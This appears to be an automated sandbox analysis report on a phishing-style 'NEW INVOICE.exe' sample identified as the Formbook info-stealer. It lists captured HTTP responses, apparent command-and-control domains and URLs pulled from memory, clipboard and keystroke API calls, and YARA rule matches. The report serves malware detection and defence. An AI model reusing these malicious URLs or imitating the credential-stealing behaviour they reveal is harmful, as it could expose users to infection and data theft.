            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 13:06:37 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 13:06:40 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 13:06:43 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 13:06:45 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 13:06:59 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 13:07:02 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 13:07:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 13:07:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: setupugc.exe, 00000005.00000002.3882121944.0000000003704000.00000004.10000000.00040000.00000000.sdmp, iLyDwpUmDRByL.exe, 00000006.00000002.3880894986.00000000031F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2691444690.000000002B2F4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://aed.shopping/aee4/?v2x4if=ES5FzaFcHZl881dcPkloWrtYSs
            Source: iLyDwpUmDRByL.exe, 00000006.00000002.3882462274.00000000052A0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yesonkoicasino.net
            Source: iLyDwpUmDRByL.exe, 00000006.00000002.3882462274.00000000052A0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yesonkoicasino.net/au3y/
            Source: setupugc.exe, 00000005.00000002.3883760403.000000000752E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: setupugc.exe, 00000005.00000002.3883760403.000000000752E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: setupugc.exe, 00000005.00000002.3883760403.000000000752E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: setupugc.exe, 00000005.00000002.3883760403.000000000752E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: setupugc.exe, 00000005.00000002.3883760403.000000000752E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: setupugc.exe, 00000005.00000002.3883760403.000000000752E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: setupugc.exe, 00000005.00000002.3883760403.000000000752E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: setupugc.exe, 00000005.00000002.3879319331.0000000002A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=0
            Source: setupugc.exe, 00000005.00000002.3879319331.0000000002A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: setupugc.exe, 00000005.00000002.3879319331.0000000002A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: setupugc.exe, 00000005.00000002.3879319331.0000000002A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: setupugc.exe, 00000005.00000002.3879319331.0000000002A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: setupugc.exe, 00000005.00000002.3879319331.0000000002A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: setupugc.exe, 00000005.00000002.3879319331.0000000002A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: setupugc.exe, 00000005.00000003.2580404915.000000000750B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: setupugc.exe, 00000005.00000002.3882121944.0000000003EDE000.00000004.10000000.00040000.00000000.sdmp, iLyDwpUmDRByL.exe, 00000006.00000002.3880894986.00000000039CE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://stratogent.info/1c49/?v2x4if=WckH/SqvT3kS7RHLNOlxiQ21wOxfNt38tZjSQddzpQSzD2qOP8gJzvFEgzI5dIM
            Source: setupugc.exe, 00000005.00000002.3883760403.000000000752E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046C5D0
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00459FFF
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046C5D0
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,0_2_00456354
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C08E

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2398520364.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3879199924.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2398092266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3879108456.0000000002950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2399026834.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3882462274.0000000005240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3878504026.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3880668788.0000000003100000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2398520364.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3879199924.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
